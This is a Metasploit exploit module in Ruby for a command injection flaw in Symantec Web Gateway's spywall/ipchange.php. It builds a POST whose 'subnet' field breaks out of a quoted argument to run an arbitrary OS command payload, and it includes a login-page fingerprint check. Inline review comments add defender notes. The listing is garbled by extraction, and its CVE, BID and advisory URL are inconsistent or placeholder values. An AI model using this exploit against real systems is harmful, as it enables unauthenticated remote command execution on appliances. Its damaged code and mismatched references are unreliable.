Require 'msf/core'
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
Include Msf: Exploit: Remote: HttpClient
# Registers the module's metadata with the framework: name, description,
# authors, references, payload constraints, platform and target list.
# NOTE(review): this listing looks extraction-damaged (capitalised keywords such
# as Def/End, spaces inserted inside constants, strings and escapes), so it is
# unlikely to parse as Ruby as shown; read it as a record of the module.
Def initialize (info = {})
Super (update_info (info,
'Name' => "Symantec Web Gateway 5.0.2.8 ipchange. php Command Injection ",
'Description' => % q {
This module exploits a command injection vulnerability found in Symantec Web
Gateway's HTTP service due to the insecure usage of the exec () function. This module
Abuses the spywall/ipchange. php file to execute arbitrary OS commands
Authentication.
},
# NOTE(review): the description's last sentence seems to have lost a word before
# "Authentication"; the request built in exploit carries no credentials, which
# suggests the issue is reachable pre-authentication - confirm upstream.
'License '=> MSF_LICENSE,
'Author' =>
[
'Tenable Network security', # Vulnerability Discovery
'Juan vazquez' # Metasploit module
],
# NOTE(review): treat these identifiers as unreliable until verified. The CVE
# year (2017) disagrees with the 2012 disclosure date and advisory year given
# on this page, the BID value looks like a placeholder, and the host of the
# second URL does not match the vendor named in the module title. The ZDI
# advisory id is the only reference here that is consistent with the rest.
'References '=>
[
['Cve', '2017-2012 '],
['Bid', '123'],
['Url', 'HTTP: // www.zerodayinitiative.com/advisories/ZDI-12-090'],
['Url', 'HTTP: // www.deletec.com/security_response/securityupdates/detail.jsp? Fid = security_advisory & pvid = security_advisory & year = 2012 & suid = 20120517_00 ']
],
'Payload' =>
{
# Bytes excluded from the payload; this appears to list NUL, CR, LF and '&'
# (0x26), presumably because they would break the POST body field - confirm.
'Badchars' => "\ x00 \ x0d \ x0a \ x26 ",
'Compat' =>
{
'Payloadtype' => 'cmd ',
'Requiredcmd' => 'generic perl ',
}
},
# Command-type payload on unix: what is delivered is an OS command line.
'Platform' => ['unix '],
'Arch '=> ARCH_CMD,
# Single target entry; no per-target options are defined.
'Targets' =>
[
['Symantec Web Gateway 5.0.2.8 ', {}],
],
'Privileged' => false,
'Disclosuredate' => "May 17 2012 ",
'Defaulttarget' => 0 ))
End
# Fingerprints the product by requesting the login page and matching its HTML
# title. Returns Detected when the title matches, Safe otherwise.
# NOTE(review): this is a presence check only. It does not read a version or
# patch level, so Detected does not mean vulnerable. Safe is also returned when
# there is no response at all (res is nil), so it does not prove the appliance
# is absent or fixed.
Def check
# Plain GET for the login page; no credentials are sent.
Res = send_request_raw ({
'Method' => 'get ',
'Url' => '/spywall/login. php'
})
# Match on the page title "Symantec Web Gateway" in the response body.
If res and res. body = ~ /\ <Title \> Symantec Web Gateway \ <\/title \>/
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End
# Sends one POST to spywall/ipchange.php whose "subnet" field carries the
# payload, then checks for the expected redirect.
# Defender's view: per the module description the script passes request input
# to exec(), so the durable fix is the vendor update named in the advisory
# listed in the references; until then, limit who can reach the management
# interface. In web logs, the visible trace is a POST to spywall/ipchange.php
# with a subnet value containing a double quote, ';' or '#'.
Def exploit
# Normalise the base path so it ends in '/'.
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
Peer = "# {rhost }:# {rport }"
# Body is "subnet=" followed by a double quote, ';', the payload, then ';#'.
# presumably the quote closes the quoted argument on the server side and '#'
# comments out the rest of the command line - verify against the advisory.
Post_data = "subnet ="
Post_data <"\"; "+ payload. raw + ";#"
Print_status ("# {peer}-Sending Command injection ")
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {uri} spywall/ipchange. php ",
'Data' => post_data
})
# If the server doesn't return the default redirection (a 302 whose Location
# matches SW/admin_config.php), something is probably wrong. A missing
# response is handled the same way. The redirect only shows the request was
# accepted; nothing here confirms the command itself ran.
If not res or res. code! = 302 or res. headers ['location']! ~ /SW \/admin_config.php/
Print_error ("# {peer}-Probably command not executed, aborting! ")
Return
End
End
End